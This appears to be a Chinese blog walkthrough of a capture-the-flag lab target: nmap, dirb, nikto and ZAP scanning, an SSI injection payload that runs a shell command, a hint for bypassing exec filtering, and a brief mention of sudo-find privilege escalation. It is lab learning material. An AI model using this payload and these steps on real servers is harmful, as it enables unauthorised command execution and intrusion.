CTF實戰(二):SSI注入

SSI注入

這是少數幾個比較完整的靶機,因此就寫一篇博客記錄一下拿shell的過程

1.主機發現

nmap -sP 10.10.3.0/24

2.服務掃描

nmap -sV 10.10.3.104
nmap -T4 -A -v 10.10.3.104

3.目錄掃描

dirb 10.10.3.104
nikto -h 10.10.3.104

4.zap掃描

這個好無聊,掃出了漏洞

5.SSI注入利用

這裏需要注意注入點
<!--# exec cmd="ls" -->
還有需要注意如果exec被過濾需要類似於sql注入的繞過嘗試

6.成功拿shell

發現是www-data權限

7.提權

這裏分享一個最新學到的提權
wyt
這張圖中sudo權限配置明顯有問題,通過find可直接進行提權
wyt

結了,這個實驗還是昨天做的,寫的有點粗糙,更新的文章也沒有那麼多了,希望接下來自己能更加努力,還有許多事要做,並沒有那麼多時間閒着,加油,也希望看到這篇博文的夥伴能一起努力,大家都有自己所堅守的,爲自己的這份底線加油吧

發表評論
所有評論
還沒有人評論,想成為第一個評論的人麼? 請在上方評論欄輸入並且點擊發布.
相關文章